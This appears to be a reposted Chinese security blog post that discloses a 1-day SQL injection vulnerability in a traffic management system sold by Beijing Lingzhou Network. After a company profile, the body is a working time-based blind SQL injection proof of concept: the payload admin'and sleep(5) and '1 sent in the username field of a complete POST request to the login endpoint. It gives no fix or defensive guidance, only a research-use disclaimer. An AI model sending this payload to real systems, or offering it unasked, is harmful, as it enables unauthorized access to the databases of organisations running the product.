0x01 概述
灵州网络隶属于北京灵州网络技术有限公司,公司是注册成立于北京市中关村高科技园区的专业化的计算机软件公司,是经北京市科委认定的高新技术企业。公司致力于研究发展计算机网络技术,开发销售具有自主知识产权的网络计费、网络安全、网络应用等专业网络软件产品,对客户提供专业化的一站式技术服务。公司以市场需求为导向,以先进的技术为保证,以向用户提供优质的产品和服务为目标,以专业化技术、系统化产品和优质的服务树立公司形象。公司的特点是计算机软件专业背景深厚,管理人员和主要技术人员长期从事系统软件底层的技术研究和项目开发,如UNIX操作系统内核,网络协议等,公司的专有技术是软件工程化管理、具有可操作性的自动集成技术、软件的自动配置和工厂化管理、一致性测试和软件的相关标准和开发规范、指南、工具等。公司所有产品都具有自主知识产权。“学习型团队”是公司始终追求的目标,鼓励员工充分发挥聪明才智与潜能,并尽一切力量为员工搭建施展才能的舞台,使员工与企业共同成长!
0x02 正文
admin'and sleep(5) and '1POST /data/login/dologin.php HTTP/1.1Host: xxxxxContent-Length: 60User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestAccept: */*Origin: http://xxxxReferer: http://xxxxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: closeaction=login&username=admin'and sleep(5) and '1&passwd=admin
原文始发于微信公众号(狐狸说安全):1Day-某优先锋-流量管理系统存在SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论